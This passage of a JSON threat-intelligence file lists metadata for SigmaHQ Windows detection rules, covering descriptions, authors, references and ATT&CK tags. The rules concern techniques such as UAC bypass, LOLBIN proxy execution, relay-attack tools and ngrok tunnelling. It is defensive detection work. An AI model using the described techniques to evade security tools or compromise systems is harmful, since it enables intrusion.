"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_portable_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd", "value": "Cloudflared Portable Execution" }, { "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mttaggart/status/1511804863293784064", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "value": "Node Process Executions" }, { "description": "Detects python spawning a pretty tty", "meta": { "author": "Nextron Systems", "creation_date": "2022-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_python_pty_spawn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "value": "Python Spawning Pretty TTY on Windows" }, { "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "value": "UAC Bypass Using Consent and Comctl32 - Process" }, { "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", "meta": { "author": "Sreeman", "creation_date": "2020-04-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" ], "tags": [ "attack.t1211", "attack.t1059", "attack.defense-evasion", "attack.persistence" ] }, "related": [ { "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "value": "Writing Of Malicious Files To The Fonts Folder" }, { "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", "meta": { "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "creation_date": "2020-10-14", "falsepositive": [ "The process spawned by vsjitdebugger.exe is uncommon." ], "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", "https://twitter.com/pabraeken/status/990758590020452353", "https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" ], "tags": [ "attack.t1218", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" }, { "description": "Detect attacker collecting audio via SoundRecorder application.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate audio capture by legitimate user." ], "filename": "proc_creation_win_soundrecorder_audio_capture.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrecorder_audio_capture.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", "value": "Audio Capture via SoundRecorder" }, { "description": "Detects execution of \"curl.exe\" with the \"--insecure\" flag.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-30", "falsepositive": [ "Access to badly maintained internal or development systems" ], "filename": "proc_creation_win_curl_insecure_connection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml" ], "tags": [ "attack.execution" ] }, "uuid": "cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec", "value": "Insecure Transfer Via Curl.EXE" }, { "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "creation_date": "2022-12-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_agentexecutor_susp_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", "https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "value": "Suspicious AgentExecutor PowerShell Execution" }, { "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml" ], "tags": [ "attack.lateral-movement", "attack.t1210" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "value": "Suspicious SysAidServer Child" }, { "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", "meta": { "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-06-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_double_extension.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/blackorbird/status/1140519090961825792", "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "value": "Suspicious Double Extension File Execution" }, { "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2023-04-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_pressanykey.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5", "https://twitter.com/mrd0x/status/1463526834918854661", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65c3ca2c-525f-4ced-968e-246a713d164f", "value": "Visual Studio NodejsTools PressAnyKey Renamed Execution" }, { "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the files are located in potentially suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_encode_susp_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "82a6714f-4899-4f16-9c1e-9a333544d4c3", "value": "File In Suspicious Location Encoded To Base64 Via Certutil.EXE" }, { "description": "Detects the execution of \"whoami.exe\" with the \"/FO\" flag to choose CSV as output format or with redirection options to export the results to a file for later use.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_output.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_output.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", "value": "Whoami.EXE Execution With Output Option" }, { "description": "Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2022-11-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gpg4win_susp_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "value": "File Encryption/Decryption Via Gpg4win From Suspicious Locations" }, { "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", "meta": { "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "creation_date": "2020-10-07", "falsepositive": [ "Utilization of this tool should not be seen in enterprise environment" ], "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.004" ] }, "related": [ { "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", "value": "Visual Basic Command Line Compiler Usage" }, { "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-24", "falsepositive": [ "Legitimate files with these rare hacktool names" ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", "https://www.localpotato.com/", "https://pentestlab.blog/2017/04/13/hot-potato/", "https://github.com/ohpe/juicy-potato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml" ], "tags": [ "attack.execution", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", "value": "Potential SMB Relay Attack Tool Execution" }, { "description": "Detects the execution of \".xbap\" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious \".xbap\" files any bypass AWL\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-01", "falsepositive": [ "Legitimate \".xbap\" being executed via \"PresentationHost\"" ], "filename": "proc_creation_win_presentationhost_uncommon_location_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "value": "XBAP Execution From Uncommon Locations Via PresentationHost.EXE" }, { "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", "meta": { "author": "Markus Neis, Swisscom", "creation_date": "2019-06-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_jusched.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "value": "Renamed Jusched.EXE Execution" }, { "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "creation_date": "2020-05-12", "falsepositive": [ "Legitimate administrative use" ], "filename": "proc_creation_win_pua_advanced_ip_scanner.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml" ], "tags": [ "attack.discovery", "attack.t1046", "attack.t1135" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "value": "PUA - Advanced IP Scanner Execution" }, { "description": "Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_copy_system_dir_lolbin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f5d19838-41b5-476c-98d8-ba8af4929ee2", "value": "LOL-Binary Copied From System Directory" }, { "description": "Detects the use of the Microsoft signed script \"CL_mutexverifiers\" to proxy the execution of additional PowerShell script commands", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113", "creation_date": "2022-05-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_cl_mutexverifiers.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "value": "Potential Script Proxy Execution Via CL_Mutexverifiers.ps1" }, { "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_addinutil_suspicious_cmdline.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "631b22a4-70f4-4e2f-9ea8-42f84d9df6d8", "value": "Suspicious AddinUtil.EXE CommandLine Execution" }, { "description": "Detect use of PDQ Deploy remote admin tool", "meta": { "author": "frack113", "creation_date": "2022-10-01", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pdqdeploy_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", "https://www.pdq.com/pdq-deploy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml" ], "tags": [ "attack.execution", "attack.lateral-movement", "attack.t1072" ] }, "related": [ { "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", "value": "PDQ Deploy Remote Adminstartion Tool Execution" }, { "description": "Detects potentially suspicious child processes of WinRAR.exe.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_winrar_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/", "https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml" ], "tags": [ "attack.execution", "attack.t1203" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "146aace8-9bd6-42ba-be7a-0070d8027b76", "value": "Potentially Suspicious Child Process Of WinRAR.EXE" }, { "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-03-01", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059.001", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "value": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call" }, { "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "meta": { "author": "frack113", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/samratashok/ADModule", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml" ], "tags": [ "attack.reconnaissance", "attack.discovery", "attack.impact" ] }, "uuid": "70bc5215-526f-4477-963c-a47a5c9ebd12", "value": "Potential Active Directory Enumeration Using AD Module - ProcCreation" }, { "description": "Detects the execution of Windows binaries from within a WSL instance.\nThis could be used to masquerade parent-child relationships\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wsl_windows_binaries_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ed825c86-c009-4014-b413-b76003e33d35", "value": "Windows Binary Executed From WSL" }, { "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_presentationhost_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_presentationhost_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", "value": "Arbitrary File Download Via PresentationHost.EXE" }, { "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-14", "falsepositive": [ "Another tool that uses the command line switches of Ngrok", "Ngrok 